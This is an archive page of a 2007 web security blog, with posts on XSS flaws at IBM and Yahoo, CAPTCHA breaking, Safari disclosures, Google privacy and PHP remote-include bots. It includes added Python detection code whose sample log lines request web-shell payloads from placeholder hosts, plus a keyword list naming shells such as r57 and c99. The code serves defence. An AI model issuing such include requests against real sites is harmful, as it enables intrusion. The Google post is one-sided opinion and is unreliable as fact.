web application security lab

Archive for June, 2007

XSS Irony

Friday, June 15th, 2007

My good (and hilarious, I might add) friend Arian Evans from WhiteHat Security sent this link out to a few people. Arian has a flair for comedy - you’d just have to spend some time with him to really understand what I mean. The link made me laugh, so I am sharing it with you. It points to a page about QuickPlace XSS filter protection on IBM’s website. The irony is that the page describing the virtues of XSS filtering is itself vulnerable to XSS. Oh what sweet irony.

Of course, it’s not really a huge deal; it’s more that it is kind of embarrassing, and exactly the reason why you should have someone who knows what they are doing look at your security. In this case the XSS was injected into the xml:lang=… parameter. There’s a first! It’s an easy one to fix, and I’m sure it will be gone soon enough, but the irony made me laugh so hard that I almost spit water out of my nose when I saw it. The moral of the story? Make sure to check your site for the vulnerability you claim to be able to prevent in your products.

First Conviction of Can Spam Act

Friday, June 15th, 2007

There is an article on The Register about a phisher who was convicted of phishing AOL employees. You can go to the article to read the whole story. The part that I thought was amazing was not that he was phishing employees, or that he got caught, but that it was the first conviction under the CAN-SPAM Act by a jury (there have been other convictions, but not by a jury).

Why CAN-SPAM? Why now? CAN-SPAM defines spam as a “commercial electronic mail message.” How is phishing a commercial electronic message? It may be fraud, but it’s certainly not commercial. To me it seems like a pretty worthless law, now more so than ever. To me this law has always seemed like an easy out to explain why certain people are allowed to spam and others aren’t, without rhyme or reason. Yet have we seen a drop in spam? Do you feel comfortable putting your email address online without anti-spam filters in place to defend against the onslaught? I think not. Herein lies the failure of a useless law. This guy could have been convicted under a dozen other laws.

I felt the same way when I first read the law. One major problem with it is that it doesn’t deal with international spam. Instead of saying that anyone who spams is culpable and letting extradition treaties deal with the aftermath, CAN-SPAM only applies to US citizens. How is that changing the problem? What if a US citizen is using offshore companies to do the deed for them? Clearly the CAN-SPAM Act needs a serious rethink, in my opinion. Let’s either scrap it, or get a real law with some teeth. Perhaps one that holds ISPs financially responsible for hosting verified spam relays and hacked machines?

Writeup on Yahoo XSS

Thursday, June 14th, 2007

Rarely Greys posted a rather long article about how you can exploit users on Yahoo through cross-site scripting vulnerabilities, the attack we all know and love. It’s actually a pretty interesting philosophical take on the issue. It does get technical near the end, including a Perl script to generate the attack on the fly.

In the end the vulnerability comes down to this exploit (click to see the XSS vulnerability). It uses an onerror event handler in an image, and since it can’t use quotes it uses String.fromCharCode to evade that. Well done. Not really news, except the writeup is pretty interesting as it goes into a lot more detail about how the attack works than I typically do.

CAPTCHA Breaking Game

Wednesday, June 13th, 2007

As mentioned on Ronald’s blog and in a rather suspicious digg entry linking to a referral code (indicating that the person who dugg it is somehow related to the site), there is a CAPTCHA breaking service located at decodetowin. The site claims to be running a sweepstakes, and the only way to win is to “decode” the CAPTCHAs. Here is text from the site:

What is Decode to Win? Decode to Win is a contest website in which you decode graphical messages to increase your chance at winning a prize. You get one point for every message you decode. At the end of each week, we pick a random user from the top 15 point holders and send him/her a prize offering. In some cases, we will send prizes to more than one user.

No doubt signing up adds your name to validated spam lists - they get you coming and they get you going. Interesting premise though. By the looks of it they are breaking Google CAPTCHAs, but it’s difficult to know for sure unless you are Google. One interesting thing I noticed while testing it is that the first attempt succeeds while the following tries always fail until you reload the Flash file. It’s unclear why they do this, but my guess is that people are likely to try more than once and unlikely to sign up, so it’s worth getting them to try three or more times in case they simply typoed the second try. It’s out there folks: no one should doubt that CAPTCHAs definitely are being broken. Thanks to Ronald for pointing this one out.

Sad Day for Safari On Windows

Tuesday, June 12th, 2007

In the last day there have been a number of vulnerabilities disclosed by researchers against the newly released Safari for Windows. The first was Dave Maynor’s full disclosure, then came Aviv Raff’s disclosure, and finally today Thor Larholm disclosed his vulnerability. Thor’s is probably the furthest along toward being an actual working exploit. Not a good day for Safari.

Probably the most interesting part of this is Dave Maynor’s reasons for going Full Disclosure. He doesn’t talk about it much on his blog, other than this little quip, “Keeping with our disclosure policy, we do not report bugs to Apple.” Apple has had a long history of bad dealings with security researchers, and they are now seeing a backlash amongst the security community. No surprises though, you get what you ask for. It pays not to make enemies in this business.

Google Ranked Worst In Privacy

Tuesday, June 12th, 2007

This is a non-technical post and completely my own opinion (as if you asked). I’m sure you all have seen this by now, in the news, on blogs, or even on Google employees’ sites, but it’s time for me to discuss my view on Google recently being ranked as having the absolute worst privacy of the 23 companies chosen for scrutiny by Privacy International in their latest report. They ranked lower than anyone else looked at, and the list included companies like Microsoft, eBay, Yahoo and MySpace. Here is a choice quote that should put to rest the idea that this is simply some rogue company’s vendetta against Google, as some people have conjectured:

This material, submitted by the Electronic Privacy Information Center (EPIC) and coupled with a submission to the FTC from the New York State Consumer Protection Board, provided additional weight for our assessment that Google has created the most onerous privacy environment on the Internet.

Again, Matt Cutts let me down when he responded to this by pointing to other people’s follies instead of focusing on Google’s privacy issues. Shame on you Matt - and didn’t Google buy a huge stake in AOL right before that privacy disclosure happened? It’s easy to point fingers but please do your homework first. I have to give Matt some leeway here - he may simply be ignorant of how the rest of the company operates.

Anyway, as a side note this was followed up by an interesting thread finding more places where a man in the middle could read usernames and passwords in Google. Google doesn’t have a great track record with security either. Tons of private information and very poor track record in keeping that information safe? Great combination.

I’ve had the dubious distinction of being tangentially part of some secret Google meetings (I am under no NDAs with them in any shape or form) and I have no doubt in my mind that every accusation made against them is true - and some I have actually seen myself. While Google plays the we’re not evil dance to the devil’s flute, the rest of the industry is actually trying to play by the rules. Even the FTC sided against Google in the Microsoft anti-trust case where Google claimed that Google’s Desktop wasn’t as useful on Vista as it was on XP. Microsoft’s answer? Google Desktop slows the computer down, it’s not Vista slowing Google’s Desktop down. Touché! I don’t blame the FTC for putting the advertising company in its place - especially an advertising company that intends to buy another advertising company that people have loathed for their privacy misdeeds for nearly a decade (DoubleClick). I used to work for an advertising company - I personally have experienced how evil they are.

Google’s tools cannot be easily avoided, even by people who choose not to download their spyware. Adsense and Google Analytics also report home and can track users as they travel from domain to domain, as do the Google images that you see on search boxes that float all over the Internet. Unless consumers know how to avoid Google’s reach, they cannot simply avoid Google by not using their downloaded executables or their search engine. That to me constitutes a huge risk to privacy. That they delete or rather anonymize (and how good is that anonymization strategy, really?) after two years is irrelevant - that’s already too long when you combine it with all the other forms of information that they have access to and log. Yes, it is a requirement of the various governments they work with, but the governments don’t ask them to combine this information, they do that on their own.

The next most common thing I hear is that most of the tracked information is only used to tune the search engine. While that sounds like a noble task, what if I am uncomfortable with having personally identifiable information combined into custom or targeted search queries? Why is there no way to opt out of their reach (even DoubleClick had this)? Herein lies my biggest concern and why I recommend privacy concerned people seek alternatives. I’ve stopped using all things Google whenever possible, and am considering adding their entire netblock to my egress filters, except for testing purposes. While Google is an innovative company in some respects, I don’t trust the motives of an advertising company. Are they any better or worse than the others? There’s probably no way to know for sure, but at least the others are forthcoming.

PHP Include Robots

Monday, June 11th, 2007

I’ve been toying around quite a bit with robots that attempt to exploit the site in various ways. I’ve been seeing an interesting shift: robots are moving away from direct exploitation and instead first probe whether the site is exploitable. That is interesting because it reduces the risk of someone just connecting to the script, downloading it and connecting to the controlling IRC servers. Here’s the list I got in today’s log file (please use extreme caution when viewing these - they are intentionally hostile in unknown ways):

You’ll notice an awful lot of “echo” versions which (when still valid) return content like:

<? echo "1122548"; ?>

Apparently others have seen this as well, so it’s not just me. This is a shift in tactics that will no doubt have a big impact on the survivability of botnets, as they will be more difficult to detect. The only problem (for the bots) is that the numbers don’t appear to be dynamic. It won’t take long to correct that, which will mean that seeing what the bots are doing will require honeypots. It’ll be interesting to see the bots evolve over time.
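As an added example (not from the post), here is a log check a defender could run over an Apache access log to pick out the include robots described above: any query parameter whose value is an absolute URL is flagged, and the remote file name tells an “echo” probe apart from a direct shell or bot payload. The log lines, host names and the hint word lists are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined log format; only the fields this check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A query-string value that is itself an absolute URL is the include-robot signature.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# File names seen in the post: "echo" probes that only print a marker, versus
# the direct shell / bot payloads the robots used to request straight away.
ECHO_PROBE_NAMES = {"echo", "echo.txt"}
PAYLOAD_HINTS = ("r57", "c99", "cmd", "shell", "evl", "xpl")


def classify_remote(url):
    """Label the included URL as 'echo-probe', 'payload' or 'unknown' by its file name."""
    base = urlsplit(url).path.rsplit("/", 1)[-1].lower()
    if base in ECHO_PROBE_NAMES:
        return "echo-probe"
    if any(hint in base for hint in PAYLOAD_HINTS):
        return "payload"
    return "unknown"


def find_rfi_probes(line):
    """Parse one access-log line; return a list of findings (empty if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    target = urlsplit(m.group("target"))
    findings = []
    # parse_qsl percent-decodes values, so an encoded http%3A%2F%2F is caught too.
    for param, value in parse_qsl(target.query, keep_blank_values=True):
        if not REMOTE_URL_RE.match(value):
            continue
        findings.append({
            "ip": m.group("ip"),
            "status": int(m.group("status")),
            "script": target.path,
            "param": param,
            "remote": value,
            "kind": classify_remote(value),
        })
    return findings


def scan_log(lines):
    """Collect findings across a log and count echo probes per source address."""
    report = {"findings": [], "probes_by_ip": {}}
    for line in lines:
        for f in find_rfi_probes(line):
            report["findings"].append(f)
            if f["kind"] == "echo-probe":
                by_ip = report["probes_by_ip"]
                by_ip[f["ip"]] = by_ip.get(f["ip"], 0) + 1
    return report


# Constructed sample lines (not the blog's log); hosts are documentation placeholders.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Jun/2007:03:14:07 -0500] "GET /index.php?page=http://bot.example.net/echo.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
10.0.0.5 - - [11/Jun/2007:03:14:09 -0500] "GET /index.php?page=http://bot.example.net/r57.txt HTTP/1.1" 200 14312 "-" "libwww-perl/5.805"
192.0.2.9 - - [11/Jun/2007:03:15:00 -0500] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.9 - - [11/Jun/2007:03:15:02 -0500] "GET /view.php?template=http%3A%2F%2Fscan.example.org%2Fecho HTTP/1.0" 200 300 "-" "Mozilla/4.0"
198.51.100.7 - - [11/Jun/2007:03:16:11 -0500] "GET /index.php?page=http://other.example.org/id.txt HTTP/1.1" 404 210 "-" "Mozilla/4.0"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines())["findings"]:
        print(f"{f['ip']:>13} {f['kind']:<10} {f['param']}={f['remote']}")
```

A 200 response to an echo probe is the one to chase first: it is the bot confirming that the include worked before the real payload is requested.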

PHPIDS Released

Sunday, June 10th, 2007

christ1an just announced that PHPIDS has been released. It has been in development for quite a while; the intention is to react (more like an IPS than an IDS) to potential attacks. From the site:

The IDS neither strips, sanitizes nor filters any malicious input, it simply recognizes when an attacker tries to break your site and reacts in exactly the way you want it to.

If you are running any custom PHP programs, I’d suggest taking this for a spin. As it is a first public release there will no doubt be some issues, but with the community’s help, hopefully this will turn into more of a ubiquitous tool to stop attackers from exploiting PHP applications. Please provide feedback about its use. I’m sure it will become a valuable resource. Nice work by .mario, christ1an and Lars.
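The Yahoo writeup above notes that the payload hides its string in String.fromCharCode because quotes are filtered, and a recognizer like PHPIDS only works if it sees through that. As an added example, not PHPIDS code and not from either post, this Python normalizer resolves fromCharCode calls before rule matching; the function names and the sample input are my own.

```python
import re

# String.fromCharCode( 88 , 0x53, ... ): decimal or hex code points, whitespace tolerated.
_CODE = r'(?:0x[0-9a-f]+|\d+)'
FROMCHARCODE_RE = re.compile(
    r'String\s*\.\s*fromCharCode\s*\(\s*(' + _CODE + r'(?:\s*,\s*' + _CODE + r')*)\s*\)',
    re.IGNORECASE,
)


def _to_literal(match):
    """Replace one fromCharCode(...) call with the quoted string it builds."""
    chars = []
    for tok in re.split(r'\s*,\s*', match.group(1)):
        code = int(tok, 16) if tok.lower().startswith("0x") else int(tok)
        chars.append(chr(code))
    return '"' + "".join(chars) + '"'


def normalize(value):
    """Resolve fromCharCode calls until nothing changes, so nested layers unwrap too."""
    previous = None
    while previous != value:
        previous, value = value, FROMCHARCODE_RE.sub(_to_literal, value)
    return value


# A tag carrying an inline event handler attribute (onerror=, onload=, ...).
EVENT_HANDLER_RE = re.compile(r'<\s*\w+[^>]*\bon\w+\s*=', re.IGNORECASE)


def inspect(value):
    """Return what a rule engine should look at: the decoded input plus two flags."""
    decoded = normalize(value)
    return {
        "decoded": decoded,
        "event_handler": bool(EVENT_HANDLER_RE.search(decoded)),
        # quotes absent before decoding but present after mark the evasion described above
        "hidden_quotes": '"' not in value and "'" not in value and '"' in decoded,
    }


# Constructed sample in the shape the writeup describes; the string it builds is just "Hi".
SAMPLE = "<img src=x onerror=alert(String.fromCharCode(72, 105))>"

if __name__ == "__main__":
    print(inspect(SAMPLE))
```

Run detection rules against the decoded form, not the raw parameter; a quote filter on the raw input passes the sample while the decoded form shows exactly what the handler would execute.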

Firefox 3.0 Address Bar Change Proposal

Sunday, June 10th, 2007

A few days ago Sylvan von Stuppe posted about a proposed change to Firefox 3.0 that changes the way the address bar works. I hadn’t heard of this proposal, but it’s an interesting one. Basically they grey out the parts of the URL that aren’t the domain. Sylvan correctly pointed out that although that’s good for showing users that they are connecting to a site other than the one they meant to go to, it has nothing to do with the content on the page. XSS is still an obvious way around this, as the malicious content can be injected into valid pages. According to Zeno, MITRE is about to disclose that XSS is the attacker’s choice.

I should say that I do think this idea is a fairly good one, but there is at least one other problem with it. Almost all websites have IP addresses associated with them (except in the case of virtual hosts, which also require a Host: header). Just because it’s an IP doesn’t mean it’s bad. I can’t tell you how annoying I find Thunderbird’s anti-phishing filter, always thinking every URL with an IP in it is a phishing attempt. That’s just not a good way to know if something is malicious or not. I would also like to see the consumer research that says people will actually use this and not be fooled by it. I’m always a little wary of “look for the ____” type security given how poorly the “look for the lock” security education has proven to work for SSL.

reCAPTCHA Image Processing To Stop Bots

Friday, June 8th, 2007

A few weeks ago Ben Maurer posted a link to a service called reCAPTCHA that attempts to solve the spam problem in the typical CAPTCHA way while solving another hard problem at the same time. reCAPTCHA is part of a project to scan old books. Part of the problem with scanning using OCR is that you sometimes get crap results. Therein lies the reCAPTCHA idea: replay that odd-looking text to users and get them to type the answers in, next to a real CAPTCHA whose answer is known. If the user gets the known one right, their answer for the OCR image is assumed to be valid.

So the next question is: what if someone doesn’t answer the second question at all, or puts in something erroneous? That’s okay; it uses a voting system to make sure more than one person agrees (I’m not sure of the specifics of the voting system). That makes for a pretty interesting system in a lot of ways. However, one comment made by “Anonymous” on Ben’s site caught my eye.

“Chinese radio scare alert: these people want to exploit your brainpower with their captcha tricks! It’s like enslaving humanity, one word at a time!”

You certainly get extra points for originality of your idea.

I’m sure nobody will get my Chinese radio reference though…

What Anonymous is referring to is the Chinese Lottery. It’s a theory in cryptography where you can get many people to each do a very small task to get the answer to a bigger problem (in the lottery example, forcing government-supplied radios to perform small parts of a very large crypto problem). For instance, if they can somehow ask users to perform a math function that is somehow more efficient for a user to do than a computer, then it makes sense. There is another similar theory using biochemical reactions in a DESasour, where each cell of an organism combines to perform a computationally complex task; given the volume of cells in any sizable creature, it would have enormous computing power.

Granted, reCAPTCHA is terrible at this - it is far more efficient to perform any mathematical task with a computer than anything a human could do. The only way I could see this being used in a nefarious way, other than the CAPTCHA proxy idea, is if part of what a government needed to do was OCR classified documents (this could be even more effective in other languages where translation services are at a premium). While possible, it sounds like quite a conspiracy theory to me. But Anonymous can rest assured that someone out there understood his reference! ;)